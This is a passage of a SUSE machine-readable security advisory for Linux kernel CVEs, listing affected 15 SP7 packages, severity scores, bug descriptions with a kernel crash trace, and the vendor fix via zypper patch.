"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68773"
},
{
"cve": "CVE-2025-68775",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68775"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/handshake: duplicate handshake cancellations leak socket\n\nWhen a handshake request is cancelled it is removed from the\nhandshake_net-\u003ehn_requests list, but it is still present in the\nhandshake_rhashtbl until it is destroyed.\n\nIf a second cancellation request arrives for the same handshake request,\nthen remove_pending() will return false... and assuming\nHANDSHAKE_F_REQ_COMPLETED isn\u0027t set in req-\u003ehr_flags, we\u0027ll continue\nprocessing through the out_true label, where we put another reference on\nthe sock and a refcount underflow occurs.\n\nThis can happen for example if a handshake times out - particularly if\nthe SUNRPC client sends the AUTH_TLS probe to the server but doesn\u0027t\nfollow it up with the ClientHello due to a problem with tlshd. When the\ntimeout is hit on the server, the server will send a FIN, which triggers\na cancellation request via xs_reset_transport(). When the timeout is\nhit on the client, another cancellation request happens via\nxs_tls_handshake_sync().\n\nAdd a test_and_set_bit(HANDSHAKE_F_REQ_COMPLETED) in the pending cancel\npath so duplicate cancels can be detected.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68775",
"url": "https://www.suse.com/security/cve/CVE-2025-68775"
},
{
"category": "external",
"summary": "SUSE Bug 1256665 for CVE-2025-68775",
"url": "https://bugzilla.suse.com/1256665"
},
{
"category": "external",
"summary": "SUSE Bug 1256666 for CVE-2025-68775",
"url": "https://bugzilla.suse.com/1256666"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "important"
}
],
"title": "CVE-2025-68775"
},
{
"cve": "CVE-2025-68776",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68776"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/hsr: fix NULL pointer dereference in prp_get_untagged_frame()\n\nprp_get_untagged_frame() calls __pskb_copy() to create frame-\u003eskb_std\nbut doesn\u0027t check if the allocation failed. If __pskb_copy() returns\nNULL, skb_clone() is called with a NULL pointer, causing a crash:\n\nOops: general protection fault, probably for non-canonical address 0xdffffc000000000f: 0000 [#1] SMP KASAN NOPTI\nKASAN: null-ptr-deref in range [0x0000000000000078-0x000000000000007f]\nCPU: 0 UID: 0 PID: 5625 Comm: syz.1.18 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014\nRIP: 0010:skb_clone+0xd7/0x3a0 net/core/skbuff.c:2041\nCode: 03 42 80 3c 20 00 74 08 4c 89 f7 e8 23 29 05 f9 49 83 3e 00 0f 85 a0 01 00 00 e8 94 dd 9d f8 48 8d 6b 7e 49 89 ee 49 c1 ee 03 \u003c43\u003e 0f b6 04 26 84 c0 0f 85 d1 01 00 00 44 0f b6 7d 00 41 83 e7 0c\nRSP: 0018:ffffc9000d00f200 EFLAGS: 00010207\nRAX: ffffffff892235a1 RBX: 0000000000000000 RCX: ffff88803372a480\nRDX: 0000000000000000 RSI: 0000000000000820 RDI: 0000000000000000\nRBP: 000000000000007e R08: ffffffff8f7d0f77 R09: 1ffffffff1efa1ee\nR10: dffffc0000000000 R11: fffffbfff1efa1ef R12: dffffc0000000000\nR13: 0000000000000820 R14: 000000000000000f R15: ffff88805144cc00\nFS: 0000555557f6d500(0000) GS:ffff88808d72f000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000555581d35808 CR3: 000000005040e000 CR4: 0000000000352ef0\nCall Trace:\n \u003cTASK\u003e\n hsr_forward_do net/hsr/hsr_forward.c:-1 [inline]\n hsr_forward_skb+0x1013/0x2860 